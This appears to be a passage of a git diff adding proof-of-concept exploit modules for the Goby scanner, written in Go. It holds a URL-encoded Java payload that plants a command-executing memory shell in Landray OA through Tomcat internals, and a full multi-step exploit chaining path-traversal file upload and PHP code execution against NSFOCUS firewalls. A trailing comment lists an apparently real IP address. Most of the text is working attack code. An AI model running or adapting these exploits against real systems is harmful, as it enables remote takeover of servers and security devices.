"s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody||" + ] + } + ], + "Tags": [ + "代码执⾏" + ], + "VulType": [ + "代码执⾏" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "", + "Translation": { + "CN": { + "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞", + "Product": "蓝凌OA", + "Description": "

蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限

", + "Recommendation": "", + "Impact": "", + "VulType": [ + "代码执⾏" + ], + "Tags": [ + "代码执⾏" + ] + }, + "EN": { + "Name": "landray-oa-treexml-rce", + "Product": "", + "Description": "", + "Recommendation": "", + "Impact": "", + "VulType": [], + "Tags": [] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + nil, + nil, + )) +} \ No newline at end of file diff --git a/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt b/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt new file mode 100644 index 000000000..727a29303 --- /dev/null +++ b/lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt @@ -0,0 +1,242 @@ +package exploits + +import ( + "fmt" + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "net/url" + "strings" + "time" +) + +func init() { + expJson := `{ + "Name": "nsfocus resourse.php arbitrary file upload vulnerability", + "Description": "

NSFOCUS Next Generation Firewall is a dedicated security firewall device.

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "Product": "nsfocus", + "Homepage": "https://www.nsfocus.com.cn/", + "DisclosureDate": "2022-07-18", + "Author": "LittleBlack", + "FofaQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"", + "GobyQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"", + "Level": "3", + "Impact": "

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "Recommendation": "

1. Block 8081 port access. 2. Pay attention to the update of the official website in time: https://www.nsfocus.com.cn/

", + "References": [ + "https://fofa.so/" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "cmd", + "type": "input", + "value": "system('id');", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "VulType": [ + "Code Execution" + ], + "Tags": [ + "Code Execution" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.5", + "Translation": { + "CN": { + "Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞", + "Product": "绿盟下一代防火墙", + "Description": "

绿盟下一代防火墙是一款专用安全防火墙设备。

绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。

", + "Recommendation": "

1、阻拦8081端口访问。2、及时关注官网更新:https://www.nsfocus.com.cn/

", + "Impact": "

绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。

", + "VulType": [ + "代码执⾏" + ], + "Tags": [ + "代码执⾏" + ] + }, + "EN": { + "Name": "nsfocus resourse.php 任意文件上传漏洞", + "Product": "nsfocus", + "Description": "

NSFOCUS Next Generation Firewall is a dedicated security firewall device.

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "Recommendation": "

1. Block 8081 port access. 2. Pay attention to the update of the official website in time: https://www.nsfocus.com.cn/

", + "Impact": "

There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.

", + "VulType": [ + "Code Execution" + ], + "Tags": [ + "Code Execution" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081") + uri1 := "/api/v1/device/bugsInfo" + cfg1 := httpclient.NewPostRequestConfig(uri1) + cfg1.VerifyTls = false + cfg1.FollowRedirect = false + cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9") + cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n" + if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") { + time.Sleep(time.Second * 5) + uri2 := "/api/v1/device/bugsInfo" + cfg2 := httpclient.NewPostRequestConfig(uri2) + cfg2.VerifyTls = false + cfg2.FollowRedirect = false + cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef") + cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n\r\n--4803b59d015026999b45993b1245f0ef--\r\n" + if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") { + u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433") + uri3 := "/mail/include/header_main.php" + cfg3 := httpclient.NewPostRequestConfig(uri3) + cfg3.VerifyTls = false + cfg3.FollowRedirect = false + cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71") + cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded") + cfg3.Data = "1=print+md5%281%29%3B" + if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil { + return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b") + } + + } + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + cmd := ss.Params["cmd"].(string) + + u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081") + uri1 := "/api/v1/device/bugsInfo" + cfg1 := httpclient.NewPostRequestConfig(uri1) + cfg1.VerifyTls = false + cfg1.FollowRedirect = false + cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9") + cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n" + if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") { + time.Sleep(time.Second * 5) + uri2 := "/api/v1/device/bugsInfo" + cfg2 := httpclient.NewPostRequestConfig(uri2) + cfg2.VerifyTls = false + cfg2.FollowRedirect = false + cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef") + cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n\r\n--4803b59d015026999b45993b1245f0ef--\r\n" + if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") { + u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433") + uri3 := "/mail/include/header_main.php" + cfg3 := httpclient.NewPostRequestConfig(uri3) + cfg3.VerifyTls = false + cfg3.FollowRedirect = false + cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71") + cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded") + cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd)) + if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 { + expResult.Output = resp3.RawBody + expResult.Success = true + } + + } + } + return expResult + }, + )) +} + +//https://222.75.146.134:4433